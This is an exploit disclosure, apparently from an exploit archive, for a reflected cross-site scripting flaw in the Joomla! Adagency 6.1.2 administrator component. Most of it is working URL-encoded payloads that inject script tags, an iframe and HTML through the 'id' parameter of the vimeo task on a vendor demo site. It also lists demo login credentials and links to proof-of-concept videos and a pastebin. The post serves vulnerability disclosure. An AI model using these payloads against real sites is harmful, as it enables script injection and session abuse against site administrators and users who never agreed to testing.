Below is a copy: Joomla Adagency 6.1.2 Cross Site Scripting
# Exploit Title: Joomla! Adagency V 6.1.2 Cross Site Scripting
# Date: 24.07.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://adagency.ijoomla.com/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog : https://pentest-vincent.blogspot.com/
# PoC:https://pentest-vincent.blogspot.com/2020/08/joomla-adagency-v-612-cross-site.html
PoC:
https://ijoomlademo.com
user demo
password demo
Example with xss code injection:
https://ijoomlademo.com/administrator/index.php?option=com_adagency&controller=adagencyAbout&task=vimeo&id=%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E
Example with xss/html code injection :
https://ijoomlademo.com/administrator/index.php?option=com_adagency&controller=adagencyAbout&task=vimeo&id=%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cbody%20background=%22https://i.gifer.com/IrM.gif%22%3E%3Cscript%3Ealert(%22Cross%20site%20scripting%20and%20html%20code%20injection%22)%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/s5_XkjC2fGY%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E
Video PoC:
https://www.youtube.com/watch?v=APDqKv88znw
Picture:
https://imgur.com/a/w2attqc
XSS code on the pastebin:
https://pastebin.com/bRSnjZtL
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum